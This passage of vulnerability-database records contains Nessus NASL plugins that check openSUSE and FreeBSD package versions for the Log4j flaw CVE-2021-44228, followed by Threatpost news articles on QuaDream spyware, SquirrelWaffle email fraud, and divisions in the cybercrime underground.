Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.2', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-javadoc-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-jcl-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j-slf4j-2.13.0-lp152.3.6.1', 'release':'SUSE15.2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-javadoc / log4j-jcl / log4j-slf4j');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T02:24:23", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-03-18T00:00:00", "type": "nessus", "title": "FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:openhab", "p-cpe:/a:freebsd:freebsd:openhab2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "href": "https://www.tenable.com/plugins/nessus/159065", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159065);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"FreeBSD : openhab -- log4j remote code injection (93a1c9a7-5bef-11ec-a47a-001517a2e1a4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 93a1c9a7-5bef-11ec-a47a-001517a2e1a4 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q\");\n # https://github.com/openhab/openhab-distro/security/advisories/GHSA-j99j-qp89-pcfq\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e4b243\");\n # https://github.com/ops4j/org.ops4j.pax.logging/security/advisories/GHSA-xxfh-x98p-j8fr\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?03d2b934\");\n # https://vuxml.freebsd.org/freebsd/93a1c9a7-5bef-11ec-a47a-001517a2e1a4.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c452b373\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/03/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openhab2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'openhab2<3.1.1',\n 'openhab<3.1.1',\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T22:38:10", "description": "[SquirrelWaffle](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) \u2013 the newish malware loader that[ first showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September \u2013 once again got its scrabbly little claws into an unpatched Microsoft Exchange server to spread malspam with its tried-and-true trick of [hijacking](<https://threatpost.com/ikea-email-reply-chain-attack/176625/>) email threads.\n\nThat\u2019s the same-old, same-old, as in, a SquirrelWaffle campaign will hijack an email thread to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent[ Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has operated.\n\nBut this time, the operators added a twist: They sucked knowledge out of an email thread and used it to trick the target into a money transfer.\n\nThey almost pulled it off. The targeted organization initiated a money transfer to an attacker-controlled account, but thankfully, one of the financial institutions involved in the transaction smelled a rat and flagged the deal as fraudulent.\n\nIn a Tuesday [post](<https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/>), Sophos analysts Matthew Everts and Stephen McNally said that typically, in SquirrelWaffle attacks \u2013 which typically entail the threat actors walking through holes left by unpatched, notorious,[ oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>)[ ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and[ ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities \u2013 the attack ends when those holes finally get patched, removing the attacker\u2019s ability to send emails through the server.\n\nBut in this recent engagement, the Sophos Rapid Response team found that while a SquirrelWaffle malspam campaign was wreaking havoc on an unpatched server, that same vulnerable server was being used by the attackers to siphon off knowledge from a stolen email thread and to launch a financial fraud attack.\n\n\u201cThe combination of Squirrelwaffle, ProxyLogon, and ProxyShell has been encountered by the Sophos Rapid Response team multiple times in the last few months, but this is the first time we have seen attackers use typo-squatting to maintain the ability to send spam once the Exchange server has been remediated,\u201d the analysts wrote.\n\n## Too Late to Patch That Leaky Exchange Roof\n\nIn this case, patching Exchange wouldn\u2019t have clipped SquirrelWaffle\u2019s tail, the analysts said, given that the attackers had already spirited away an email thread about customer payments from the victim\u2019s Exchange server.\n\nBesides which, as the analysts noted and as Sophos [detailed](<https://news.sophos.com/en-us/2021/03/25/patching-alone-is-not-enough-investigate-your-exposure-windows/>) last March, patching isn\u2019t the end-all, be-all for remediating vulnerable Exchange servers. For one thing, you also need to determine whether attackers have pulled off any other mischief, such as installing webshells.\n\n## Typosquatting Their Way Into Inboxes\n\nThe double-up attack on the vulnerable Exchange server started with the attackers registering a [typosquat](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) domain. In other words, they registered a domain name that resembled the victim\u2019s legitimate domain but with a small typo, then used email addresses from the look-alike domain to reply to the email thread.\n\n\u201cMoving the conversation out of the victim\u2019s email infrastructure gave the attackers operational control over what happened next,\u201d Everts and McNally explained.\n\nWhat happened next was that the attackers tried to divert the victim\u2019s customer\u2019s payments to accounts they controlled. In their hunt for legitimacy, they went so far as to copy more email addresses, to make it look like they were requesting support from an internal department. But these additional email addresses were just as bogus, being sent with the same almost, not-quite, look-alike typosquat domain.\n\nNext, they started using \u201cthis transaction\u2019s ready to go!\u201d language, as in the screen capture Sophos provided below.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163107/finance_dept_cc_ed.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163107/finance_dept_cc_ed.jpg>)\n\nSource: Sophos.\n\nNext came some foot-tappingly stern language to ratchet up the urgency, as shown in the next screen grab. \u201cI appreciate how busy you are,\u201d the crooks crooned, among other things that sounded like legitimate accounting blah-blah-blah, \u201cbut wondered if you could give me an update regarding the renewal?\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163737/More_accounting-ese.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163737/More_accounting-ese.jpg>)\n\nSource: Sophos.\n\nThe attackers\u2019 fake accountant faux-relaxed after the SquirrelWaffle operators received an email indicating that the illegitimate payment was being processed, assuring their mark that they\u2019d get them an invoice ASAP.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15164119/kind_regards.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15164119/kind_regards.jpg>)\n\nSource: Sophos.\n\n## How to Cage This Twitchy Rodent\n\nSophos offered advice on how to protect against malicious email attacks such as the SquirrelWaffle campaign, the first of which is a head-desk-bang-bang clich\u00e9: Namely, patch those servers.\n\n\u201cThe single biggest step defenders can take to prevent the compromise and abuse of on premises Microsoft Exchange servers is to ensure that they have been patched with the most recent updates from Microsoft,\u201d according to the post.\n\nAlso:\n\n * Implement industry standards for email authentication, such as SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication Reporting and Conformance, in order to make it easier for other organizations to figure out if emails are legitimate. \u201cUsing these standards can make it harder for an attacker to send spoofed emails impersonating your domain,\u201d Sophos said.\n * Consider email security products that integrate artificial intelligence to help fend off increasingly sophisticated social engineering attacks, phishing lures and impersonation messages.\n * Protect the recipients of such emails and ensure that users in your organization can spot phishing attempts and know how to report and respond to them.\n\nSophos also provided tips on what to do if your organization has already been attacked. In fact, it\u2019s put together a [Squirrelwaffle Incident Guide](<https://news.sophos.com/en-us/2022/02/15/rapid-response-the-squirrelwaffle-incident-guide/>) to help victims investigate, analyze and respond.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T22:31:33", "type": "threatpost", "title": "SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T22:31:33", "id": "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "href": "https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for 